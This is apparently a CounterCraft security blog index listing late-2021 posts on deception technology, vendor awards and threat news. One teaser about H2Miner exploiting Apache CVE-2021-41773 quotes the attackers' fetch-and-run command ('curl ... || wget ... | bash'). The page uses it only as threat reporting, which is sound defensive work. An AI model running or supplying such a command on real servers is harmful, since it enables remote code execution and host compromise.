Our blog is a playground with fresh ideas about security and our approach

26 Nov

Deception Tops List of Technologies in 2021 IDG Security Priorities Study


From ransomware to malware affecting critical infrastructure, cyber attacks are more mainstream and more damaging than ever. Keeping up with all the attack vectors and evolving threats gets more challenging by the day. IDG’s recently released 2021 Security Priorities study is an important look at the state of security strategies today. This 2021 report provides an in-depth look at the security landscape today from the valuable viewpoint of its top leaders and decision makers.

23 Nov

CounterCraft Named Overall Leader by KuppingerCole


KuppingerCole recently named CounterCraft as an overall leader in their Distributed Deception Platforms Leadership Compass report. CounterCraft appears as an Overall Leader, a Product Leader, and an Innovation Leader. The report, written by John Tolbert, provides an overview of the market for Distributed Deception Platforms (DDPs) and provides a compass to help guide businesses on their solutions. KuppingerCole examines the market segment, vendor service functionality, relative market share, and innovative approaches to providing DDP solutions.

18 Nov

NIST Documents Highlight Deception Technology


Today information security (infosec) and cybersecurity are quickly becoming a top priority for organizations. As it should—there are an estimated 200 Advanced Persistent Threat (APT) groups globally, with new ones popping up every day. From script kiddies to sophisticated technical experts, backed by foreign nations looking to disrupt our way of life for political gain or cybercriminals attacking organizations for monetary gains. In fact, per Accenture, in 2019 the average cost of cybercrime for organizations was $13 million.

16 Nov

CVE-2021-41773 Actively Exploited by H2Miner


Cloud computing has its share of major security threats, and there are some that are both consistent and insistent. One of them is the H2Miner/Kinsing malware. The people behind it use high severity, public vulnerabilities to continue installing their RAT and miner, such as the recent Apache Path Traversal CVE-2021-41773, the last vulnerability added to their already expansive portfolio. In this case, they are looking for servers with mod_cgi enabled in order to directly infect the server by running a simple curl -s URL||wget -q -O- URL) | bash command, which, if successful, will compromise the host and will even return the script output in the HTTP response.

10 Nov

10 Ways Your Business Can Benefit from Deception


In 2021, deception solutions have grown from a nice-to-have option to a must-have for threat analysis teams, especially at verticals that are constantly targeted and hit by advanced persistent attacks. Deception provides very real value, and we’ve gotten together a list of the biggest benefits of employing deception technology. Read on for our list of the top 10 ways your business can benefit from employing deception techniques as part of its cybersecurity strategy.

9 Nov

Improving OT Security {Data Sheet}


Cyber attacks on critical infrastructure and physical systems are on the rise. From the Colonial pipeline attack to the Florida water plant hack, the threat has become so imminent that the Cybersecurity & Infrastructure Security Agency has released several warnings, including the October 2021 “Ongoing Cyber Threats to U.S. Water and Wastewater Systems” alert. Operational Technology (OT) networks, such as SCADA and Industrial Control Systems (ICS), have many unique characteristics that make defensive countermeasures against cyber attacks a challenging job.

4 Nov

CounterCraft Participates in the MITRE Engenuity ATT&CK Evaluation Trials


CounterCraft is thrilled to announce that we will be participating in the MITRE Engenuity ATT&CKEvaluation Trials for deception. The evaluation trials are tailored, focused research projects into different security solutions. The MITRE Engenuity ATT&CK® Evaluations began in 2018 and are designed to provide clarity around ATT&CK coverage and are well-regarded, industry standard-setting evaluations. It is an honor to be a part of MITRE’s first Trial research project. Read on for more about these exciting Evaluation Trials.

3 Nov

Docker Daemon Worms | Founder Chat


Docker containers being exploited by cryptojacking worms. It’s an issue we began to see a couple years ago, and these worms are still alive and kicking. CounterCraft’s founders talk about exactly how this generation of Docker daemon worms are working. Our threat intel team created an open Docker daemon. We found that the Cetus worm almost immediately located our open Docker daemon and connected to it. Find out how CounterCraft gathered intel on the exploits happening in real time, as well as what the Docker daemon worms’ workings revealed, including the IOCs of TeamTNT and a quirky naming convention.

30 Oct

What We're Reading


Governments are taking new actions against cyber criminals. Meanwhile, threat actors go after more and more important targets. Read on for the news we’ve been following this month. A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries A new APT group, ChamelGang, was identified recently. This group uses a trending penetration method—supply chain— to steal data from compromised networks. The gang targets various industries across Russia, the U.S., India, Nepal, Taiwan, and Japan by disguising its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.

29 Oct

CounterCraft Named 2021 Gartner Cool Vendor


Gartner recently named CounterCraft a 2021 Cool Vendor in the Gartner Cyber-Physical Systems Security report. Being recognized as a Cool Vendor in this sector is a huge validation for the CounterCraft technology and team. Gartner Cool Vendor Reports highlight interesting and innovative vendors, products, and services. Cyber-physical systems are truly one of the most challenging systems to protect in the realm of cybersecurity. Cyber Physical Systems (CPS) are integration of computation, networking and physical process and are very complex, especially when several CPS need to be combined.

Page 1 of 20